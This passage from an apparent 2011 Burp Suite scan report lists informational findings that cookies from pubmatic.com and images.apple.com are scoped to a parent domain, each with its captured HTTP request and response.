Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

KRTBCOOKIE_27=1216-uid:4dc0222e-3ec1-3315-901d-9f5b34470a53; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:42:59 GMT; path=/
PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268.362_1313865779; domain=pubmatic.com; expires=Sun, 20-Jul-2014 13:38:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD00MzIwMA==&piggybackCookie=uid:4dc0222e-3ec1-3315-901d-9f5b34470a53 HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256; KTPCACOOKIE=YES; PUBMDCID=2; pubtime_26922=TMC; PMDTSHR=; KRTBCOOKIE_58=1344-AA-00000001931708427; KRTBCOOKIE_80=1336-2ecd6c1e-5306-444b-942d-9108b17fd086.38747.66267.38582.39303.; KRTBCOOKIE_57=476-uid:6516234360771219075; KRTBCOOKIE_107=1471-uid:0892d3fc-c93f-4985-8ab2-420c545c19b6; pubfreq_26922_21911_2066933745=165-1

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:42:59 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_27=1216-uid:4dc0222e-3ec1-3315-901d-9f5b34470a53; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:42:59 GMT; path=/
Set-Cookie: PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268.362_1313865779; domain=pubmatic.com; expires=Sun, 20-Jul-2014 13:38:06 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.81. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

KRTBCOOKIE_107=1471-uid:0892d3fc-c93f-4985-8ab2-420c545c19b6; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:00:59 GMT; path=/
PUBRETARGET=2114_1326806725.82_1405863486.571_1405879259; domain=pubmatic.com; expires=Sun, 20-Jul-2014 18:00:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:0892d3fc-c93f-4985-8ab2-420c545c19b6 HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256; KTPCACOOKIE=YES; PUBMDCID=2; pubfreq_26922=; pubtime_26922=TMC; pubfreq_26922_21908_67256883=165-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:59 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_107=1471-uid:0892d3fc-c93f-4985-8ab2-420c545c19b6; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:00:59 GMT; path=/
Set-Cookie: PUBRETARGET=2114_1326806725.82_1405863486.571_1405879259; domain=pubmatic.com; expires=Sun, 20-Jul-2014 18:00:59 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.82. http://images.apple.com/global/metrics/js/s_code_h.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/metrics/js/s_code_h.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/metrics/js/s_code_h.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "ed30-4a6ccd3839dc0"
If-Modified-Since: Tue, 28 Jun 2011 22:02:39 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 28 Jun 2011 22:02:39 GMT
ETag: "ed30-4a6ccd3839dc0"
Cache-Control: max-age=550
Expires: Thu, 21 Jul 2011 20:40:58 GMT
Date: Thu, 21 Jul 2011 20:31:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.83. http://images.apple.com/global/nav/scripts/globalnav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/scripts/globalnav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=cxVWFEgCbMgUgDRkyE0d4yvNVcp1ceQGZ5qMGww/wvgs3pDIJPL2naJnvuJBopZIfNrD9qdt639zRNXWNXmaJwbD/UQrX4vZnidsVeTVYZbeun3M71BwA+LwabJfNO5dX/28lpneIqPvEwwCp7hKEIawjRuoDwGPk9qbqm/0jSCSsxVteeHVaHjguRFyXJZZQLySitDGiceJt7IherIIvxJ+csWMXuRv+YN6XXawLvas1EM844mCEGdlI08LTJ/5xYmr/m0tifR7grT+OEYpPbGGbavuIw+iy1cE6lhjYIkjDsVHr6xzCr6HO3nPKVKG7i+GVjHLHUOPqoxZ6ye0zc1P0XqBgqQELdRvsivhgSL4fKt3xOtIM2+zp3+tkt4b3MH4gcY1636k6gSdKI59UjE+hji5j/ObqE8ZAtMxaQu3quev6Z1h25bMHBctf/DSkCMtLbGRb35VFwz96aXQf8NTzY45zFrpCvjJQFUm1OBwjVhLKv/0GNElSkPGtXNfCpbXNK/8nMvX4VgAknPebaaHMPYDTNoiY5fOxkR/FvjJuDgTVZylQGbarX8iHIAf; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/scripts/globalnav.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "6e6f-4a173609c2740"
If-Modified-Since: Thu, 21 Apr 2011 20:13:41 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Apr 2011 20:13:41 GMT
ETag: "6e6f-4a173609c2740"
Cache-Control: max-age=554
Expires: Thu, 21 Jul 2011 20:34:15 GMT
Date: Thu, 21 Jul 2011 20:25:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=cxVWFEgCbMgUgDRkyE0d4yvNVcp1ceQGZ5qMGww/wvgs3pDIJPL2naJnvuJBopZIfNrD9qdt639zRNXWNXmaJwbD/UQrX4vZnidsVeTVYZbeun3M71BwA+LwabJfNO5dX/28lpneIqPvEwwCp7hKEIawjRuoDwGPk9qbqm/0jSCSsxVteeHVaHjguRFyXJZZQLySitDGiceJt7IherIIvxJ+csWMXuRv+YN6XXawLvas1EM844mCEGdlI08LTJ/5xYmr/m0tifR7grT+OEYpPbGGbavuIw+iy1cE6lhjYIkjDsVHr6xzCr6HO3nPKVKG7i+GVjHLHUOPqoxZ6ye0zc1P0XqBgqQELdRvsivhgSL4fKt3xOtIM2+zp3+tkt4b3MH4gcY1636k6gSdKI59UjE+hji5j/ObqE8ZAtMxaQu3quev6Z1h25bMHBctf/DSkCMtLbGRb35VFwz96aXQf8NTzY45zFrpCvjJQFUm1OBwjVhLKv/0GNElSkPGtXNfCpbXNK/8nMvX4VgAknPebaaHMPYDTNoiY5fOxkR/FvjJuDgTVZylQGbarX8iHIAf; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.84. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=mfV4tVh4dgUZVrEM7tD+7+xXOxo+NDGZjQQFY7dvAL9ehOI2edtSrU0JwrPQlxLrLfACeMJ9R/dKN+WKd9zM6sCKRkzBwLXpPHx2iZs6DT6JBfou9msW35vA+NHXgNLdv4pAmDxb1d9G1gys0Kl6KgMhMEH2nVgdmTqca6mLT1SNkCQHpF3z+VY85JeB2pQm8+Ul2UxJ9aBAoQKKZmClQk92XyID36Jahux7r0FHZ6XwIhX/hXsM+hagMCBWMlF8XDgmbelJa/y9OxJFdaP6mpk0rWu52PiW+y11mUlfT7pwuqW0E30JEmHBTxZGbKIMDWgjCrazzhfJmlkB/1jsdlQxSr3cajxsYkM6C6kX150K61jGNe825c1qYsH9hQ8vdPJY3TV2M6T9H8T1MpdUEkXTiBaHGBmii/pxuVtfGzOWmazsfd+jT+ivXDsQO9UlAifCyzt+VHS9srArldN7M5h77EhlOrtfe2sSsnBzodnuj2Bt8G/D3NGu7ROXneRRYhJh7XeATyislaVfmdQi62YmrXX9BPd6fe448U8pI1H/t3Jp0WW/OwK/9Bt8uqyu; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=309
Expires: Thu, 21 Jul 2011 20:30:06 GMT
Date: Thu, 21 Jul 2011 20:24:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=mfV4tVh4dgUZVrEM7tD+7+xXOxo+NDGZjQQFY7dvAL9ehOI2edtSrU0JwrPQlxLrLfACeMJ9R/dKN+WKd9zM6sCKRkzBwLXpPHx2iZs6DT6JBfou9msW35vA+NHXgNLdv4pAmDxb1d9G1gys0Kl6KgMhMEH2nVgdmTqca6mLT1SNkCQHpF3z+VY85JeB2pQm8+Ul2UxJ9aBAoQKKZmClQk92XyID36Jahux7r0FHZ6XwIhX/hXsM+hagMCBWMlF8XDgmbelJa/y9OxJFdaP6mpk0rWu52PiW+y11mUlfT7pwuqW0E30JEmHBTxZGbKIMDWgjCrazzhfJmlkB/1jsdlQxSr3cajxsYkM6C6kX150K61jGNe825c1qYsH9hQ8vdPJY3TV2M6T9H8T1MpdUEkXTiBaHGBmii/pxuVtfGzOWmazsfd+jT+ivXDsQO9UlAifCyzt+VHS9srArldN7M5h77EhlOrtfe2sSsnBzodnuj2Bt8G/D3NGu7ROXneRRYhJh7XeATyislaVfmdQi62YmrXX9BPd6fe448U8pI1H/t3Jp0WW/OwK/9Bt8uqyu; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.85. http://images.apple.com/global/scripts/apple_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=6zGJJ+SbifeMK9hVAnH7zqmoyGnKztAft4oVnEoVLwCmQOp+JoTF3nEi5afg8pQUnBpi9HnlCbYehbNJ2Yui1BDeUQIVNeHr2wHheNPY7qpsuTG2q8PiM6a4lbubItM6odn2sKTVGV5gg6IBeot1SjgZPag4umq9e+AlAcEKrfxF5UIHFh7TgHBqilazsCJgXsbaWpvz7ePt6xnrFzsJGNjeaEisqfM+1NhBhPqvOxZwP4eMpIlar3rMxJcjO0i8batYun0iVZiRp1KVTzDcBZZ1uU6dW/OEcRLS2m1W4irPuQNvhqgShTMgTpx1grx0q/gHRpZA0/yD2yDxJ3ZMUX5Yf0PSbA/LwJC2qdG/xEXTBmHLCMCDM7O69qEl7aiD5qsC/4HkOvp84fCODyk5cw4ghWx0q3Rbcon15MAr1FOHbUop+7sF5VOXnSg7cmLlnF55H9v7upVz9dIVloaD9ZfzH4D9rh+2yZBgOPYawalZTTd/zxWWXta7u4V61kaJk+Mv2ho1vAAb4zDnWIxekZOuBuexbAnx281CJIx/jHA3F/Vq0847SBIpQl2NzifJ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/apple_core.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "52da-4a36ce1818580"
If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 23:19:02 GMT
ETag: "52da-4a36ce1818580"
Cache-Control: max-age=544
Expires: Thu, 21 Jul 2011 20:34:03 GMT
Date: Thu, 21 Jul 2011 20:24:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=6zGJJ+SbifeMK9hVAnH7zqmoyGnKztAft4oVnEoVLwCmQOp+JoTF3nEi5afg8pQUnBpi9HnlCbYehbNJ2Yui1BDeUQIVNeHr2wHheNPY7qpsuTG2q8PiM6a4lbubItM6odn2sKTVGV5gg6IBeot1SjgZPag4umq9e+AlAcEKrfxF5UIHFh7TgHBqilazsCJgXsbaWpvz7ePt6xnrFzsJGNjeaEisqfM+1NhBhPqvOxZwP4eMpIlar3rMxJcjO0i8batYun0iVZiRp1KVTzDcBZZ1uU6dW/OEcRLS2m1W4irPuQNvhqgShTMgTpx1grx0q/gHRpZA0/yD2yDxJ3ZMUX5Yf0PSbA/LwJC2qdG/xEXTBmHLCMCDM7O69qEl7aiD5qsC/4HkOvp84fCODyk5cw4ghWx0q3Rbcon15MAr1FOHbUop+7sF5VOXnSg7cmLlnF55H9v7upVz9dIVloaD9ZfzH4D9rh+2yZBgOPYawalZTTd/zxWWXta7u4V61kaJk+Mv2ho1vAAb4zDnWIxekZOuBuexbAnx281CJIx/jHA3F/Vq0847SBIpQl2NzifJ; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.86. http://images.apple.com/global/scripts/browserdetect.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=XqG24RKHiB3KpZrwS31AIT/E4Q0vvokPyR0Q0jStmM3MNmh8FcxhQM6VXsEXg4CZ6nF5NN8C6ez+JxhEEfuJyLXihr3cN80waGouuki0UrqjcxlKbUtxl8eidcsQAeG8BXEi6mkyhAaOf72yr9luI+vdfzfQ/Bo1CNE+i3SWJJiy56nPmFjGFsePEoSTPOG+bJCLKqwLRW/1Fd5xyQjWptxhL9uBv2XFCjKDg0Pu2hO7gQjD6ysCAJM3qYTQWH4pZ//82ogWBRgTZrBwLwFs9GRubDUERaR2F+4iQLL4rnUgUBlpNh7guqotbh6g8ifxm5zNu97KG4zZ6vZBeWJmuCdNfYzPeEoJsZyAORrxqANJlqUNewm81R987stPeXkZv4nFLSFTcS2AC/Mno5+uXmRy1gYLkeCbHCfawurIgyOafvcxnRZBHgkGFS23YeYiofWcTPAZeaAsu37YAIcSpzx31YwwfaV3baJdWKQ6pi3EEHT7yRFpajDy9M6h06cKNcWy6pVJxcFmU8SrKB0Y3v5Ym7WKE0XUbzBHx+uJOg29fzmBsAqQzjCvsPAieBOa; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/browserdetect.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "25fd-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "25fd-4a4e72621e9c0"
Cache-Control: max-age=585
Expires: Thu, 21 Jul 2011 20:34:44 GMT
Date: Thu, 21 Jul 2011 20:24:59 GMT
Connection: close
Vary: Accept-Encoding
